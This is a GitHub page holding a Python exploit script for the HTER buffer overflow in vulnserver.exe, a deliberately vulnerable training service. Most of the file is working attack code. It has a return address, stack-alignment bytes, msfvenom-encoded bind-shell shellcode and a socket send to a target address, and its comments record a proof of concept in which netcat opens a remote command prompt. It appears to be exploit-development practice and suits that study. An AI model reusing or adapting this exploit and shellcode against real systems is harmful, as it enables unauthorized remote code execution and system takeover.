-
Notifications
You must be signed in to change notification settings - Fork 3
/
exploit-HTER.py
56 lines (49 loc) 路 2.12 KB
/
exploit-HTER.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
#!/usr/bin/python
#
# November 2017 | github.com/rafaveira3
#
# Exploit vulnserver.exe - HTER - Buffer Overflow
#
# How I tested it:
# - Windows XP SP2.
# - Download and install vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE)
# - http://sites.google.com/site/lupingreycorner/vulnserver.zip
#
#
# Development Proccess:
# -
#
# PoC:
# Windows XP:
# - Double Click vulnserver.exe
#
# Kali:
# root@kali:~# python exploit-HTER.py
# root@kali:~# nc -nv 10.0.0.35 443
# (UNKNOWN) [10.0.0.35] 443 (https) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\rafael\Desktop\WORK\vulnserver>
#
# Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems.
# Accessing a computer system or network without authorization or explicit permission is illegal.
#
#
import socket
import os
import sys
# jmp eax found at 0x625011b1 - essfunc.fll
ret = "B1115062"
# msfvenom -p windows/shell_bind_tcp -e x86/shikata_ga_nai -b "\x00" LPORT=443 -f hex
# Payload Size: 355
shellcode = "bbf3f063d7dacbd97424f45f2bc9b153315f12035f128334f48122461dc7cdb6dea84453efe8331040d930746d92156ce6d6b1834f5ce4aa50cdd4add20c090deade5c4c2b02ac1ce44803b08105983bd98898d8aaab894fa0f5096e658e03686aabda035847ddc590a872281d5b8a6d9a84f987d839fa5ca2e58f46046d37a2b4a2ae21ba0fa46ddf8e6906db1b8cc86d5fabcc363bd25593eaeb857c524ece9187e38dfd64ce2dfee2595eccadf1c87c25dc0f821c989f7d9fd9b6b9cb89a06874423094a1ff38331ae2c583caa2656c012d5a8c2ae7f325d708fa0e5eee966037b80e436c71a9bc46295df480ee62058758f48ec45ce590c0f472069e9431b69fbca15b0d5b31152ef46672800de26ebba710735d8f90a89e0e193c9a3409f823717d54722f2b122c8185cc834b4188ef4b1795253af724907b0888748c71f4e473a8bc153ef095bde761a4a3175cebdd9b549419831d916603ceebf7e6f058f722"
alignESP = "50" # PUSH EAX
alignESP += "5C" # POP ESP
alignESP += "90"*32 # NOPs
evil = alignESP + shellcode + "A"*(2040-len(shellcode)-len(alignESP)) + ret + "D"*1152
data = "HTER 0" + evil
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("10.0.0.35", 9999))
expl.send(data)
expl.close()